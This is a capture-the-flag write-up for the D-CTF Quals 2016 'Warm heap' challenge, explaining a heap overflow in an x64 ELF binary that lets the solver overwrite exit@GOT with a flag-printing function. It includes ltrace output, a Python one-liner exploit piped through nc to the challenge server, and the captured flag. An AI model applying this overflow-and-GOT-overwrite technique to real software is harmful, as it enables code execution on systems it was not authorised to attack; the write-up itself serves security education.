D-CTF Quals 2016 - Warm heap [Exploit]

• Competition: https://dctf.def.camp/
• Challenge Name: Warm heap
• Type: Exploitation
• Points: 100

While analyzing the provided binary (ELF x64), only NX is enabled.

Inspecting it and putting a long string in the first line, a segmentation fault happens. Using the ltrace is possible to see exactly what is going on:

$ ltrace ./exp100.bin
__libc_start_main(0x4008a8, 1, 0x7ffdb143cf78, 0x4009c0 <unfinished ...>

...
fgets(AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA "AAA%AAsAABAA$AAnAACAA-AA(AADAA;A"..., 4096, 0x7f4d857ba8e0)               = 0x7ffdb143be80

strcpy(0x237a030, "AAA%AAsAABAA$AAnAACAA-AA(AADAA;A"...)                           = 0x237a030

fgets(BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"..., 4096, 0x7f4d857ba8e0)                 = 0x7ffdb143be80

strcpy(0x4141464141304141, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"... <no return ...>

--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

As observed, using 40 bytes offset on the first line, we can control the first argument on the second strcpy(), the destination address. And with the second line we can control the second argument, the data being copied, so let’s plan the strategy.

While reversing it, it is possible to see that the program calls a function exit@GOT at 0x601068 after the strings copies are done, so we can overwrite it with anything we want and it will be executed.

During the binary inspection on IDA Pro, we can easily identify a function that prints the flag at 0x400826, as observed below:

So, we can overwrite the exit@GOT with the print flag function address.

$ python -c 'print "A"*40 + "\x68\x10\x60\x00\x00\x00\x00\x00" + "\n" + "\x26\x08\x40\x00\x00"'| nc 10.13.37.21 13371

And the flag comes up:

DCTF{b94c21ff7531cba35a498cb074918b3e}